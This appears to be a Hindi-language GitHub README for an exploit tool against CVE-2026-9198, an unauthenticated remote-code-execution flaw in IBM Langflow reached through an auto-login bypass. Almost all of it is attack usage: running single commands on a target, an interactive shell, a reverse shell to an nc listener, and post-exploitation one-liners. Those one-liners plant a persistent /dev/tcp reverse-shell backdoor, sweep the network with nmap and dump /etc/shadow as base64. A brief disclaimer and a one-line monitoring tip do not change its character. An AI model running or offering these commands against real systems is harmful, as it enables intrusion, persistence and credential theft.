
IBM Langflow में ऑटो-लॉगिन बाईपास के माध्यम से अनधिकृत RCE
CVE-2026-9198 IBM Langflow OSS में एक गंभीर अनधिकृत रिमोट कोड निष्पादन (RCE) भेद्यता है। यह एक्सप्लॉइट दो भेद्यताओं को जोड़ता है:
/api/v1/validate/code एंडपॉइंट में कोड इंजेक्शन जो मनमाना Python निष्पादन की अनुमति देता है⚠️ चेतावनी: यह टूल केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। अनधिकृत उपयोग अवैध है।
pip पैकेज मैनेजरgit clone https://github.com/0xgh057r3c0n/CVE-2026-9198.git
cd CVE-2026-9198
pip install termcolor
या सभी निर्भरताएँ एक साथ इंस्टॉल करें:
pip install -r requirements.txt
python CVE-2026-9198.py --help
आपको सभी उपलब्ध विकल्पों के साथ हेल्प मेनू देखना चाहिए।
लक्ष्य पर एक एकल कमांड निष्पादित करें:
python CVE-2026-9198.py -t <target_ip> -c "id"
उदाहरण:
python CVE-2026-9198.py -t 192.168.1.100 -c "whoami"
डायनामिक प्रॉम्प्ट के साथ एक इंटरैक्टिव शेल लॉन्च करें:
python CVE-2026-9198.py -t <target_ip> --shell
विशेषताएँ:
user@host और वर्तमान निर्देशिका दिखाता हैcd कमांड समर्थनउदाहरण सत्र:
┌─[root@0xgh057r3c0n]─[~]
└──╼ $ whoami
root
┌─[root@0xgh057r3c0n]─[~]
└──╼ $ cd /tmp
┌─[root@0xgh057r3c0n]─[/tmp]
└──╼ $ pwd
/tmp
लिसनर को रिवर्स शेल पेलोड भेजें:
python CVE-2026-9198.py -t <target_ip> --lhost <your_ip> --lport <port>
उदाहरण:
# On your machine - Start listener
nc -lvnp 4444
# Then run the exploit
python CVE-2026-9198.py -t 192.168.1.100 --lhost 192.168.1.50 --lport 4444
यदि Langflow गैर-डिफ़ॉल्ट पोर्ट पर चल रहा है:
python CVE-2026-9198.py -t <target_ip> -p <port> -c "whoami"
उदाहरण:
python CVE-2026-9198.py -t 192.168.1.100 -p 8080 -c "ls -la"
ऑटो-लॉगिन प्रक्रिया को छोड़ें और मौजूदा टोकन का उपयोग करें:
python CVE-2026-9198.py -t <target_ip> -k <your_jwt_token> -c "id"
धीमे नेटवर्क के लिए HTTP टाइमआउट समायोजित करें:
python CVE-2026-9198.py -t <target_ip> --timeout 30 -c "whoami"
python CVE-2026-9198.py -t 192.168.1.100 -c "uname -a"
python CVE-2026-9198.py -t 192.168.1.100 --shell
# Then inside the shell:
ls -la
cat /etc/passwd
# Create a reverse shell that persists
python CVE-2026-9198.py -t 192.168.1.100 -c "echo 'bash -i >& /dev/tcp/192.168.1.50/4444 0>&1' > /tmp/backdoor.sh && chmod +x /tmp/backdoor.sh && /tmp/backdoor.sh"
python CVE-2026-9198.py -t 192.168.1.100 -c "nmap -sP 192.168.1.0/24"
python CVE-2026-9198.py -t 192.168.1.100 -c "cat /etc/shadow | base64"
इस भेद्यता से सुरक्षा के लिए:
/api/v1/auto_login और /api/v1/validate/code पर असामान्य API अनुरोधों की निगरानी करेंयह टूल केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। लेखक इस सॉफ़्टवेयर के किसी भी दुरुपयोग या क्षति के लिए ज़िम्मेदार नहीं है। उपयोगकर्ता लागू कानूनों और विनियमों का पालन करने के लिए पूरी तरह ज़िम्मेदार हैं।
यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।
0xgh057r3c0n
योगदान का स्वागत है! कृपया बेझिझक पुल रिक्वेस्ट सबमिट करें।
git checkout -b feature/AmazingFeature)git commit -m 'Add some AmazingFeature')git push origin feature/AmazingFeature)यदि आपको यह टूल उपयोगी लगता है, तो कृपया इसे GitHub पर ⭐ देने पर विचार करें!
| तर्क | विवरण | आवश्यक | डिफ़ॉल्ट |
|---|
-t, --target | लक्ष्य होस्ट/IP या पूर्ण URL | ✅ हाँ | - |
-p, --port | Langflow पोर्ट | ❌ नहीं | 7860 |
-c, --cmd | एक एकल कमांड निष्पादित करें | ❌ नहीं | "id" |
--shell | इंटरैक्टिव स्यूडो-शेल मोड | ❌ नहीं | False |
--lhost | रिवर्स शेल लिसनर IP | ❌ नहीं | - |
--lport | रिवर्स शेल लिसनर पोर्ट | ❌ नहीं | 4444 |
-k, --token | दिए गए बियरर टोकन का उपयोग करें | ❌ नहीं | - |
--timeout | सेकंड में HTTP टाइमआउट | ❌ नहीं | 20 |
--no-banner | बैनर छिपाएँ | ❌ नहीं | False |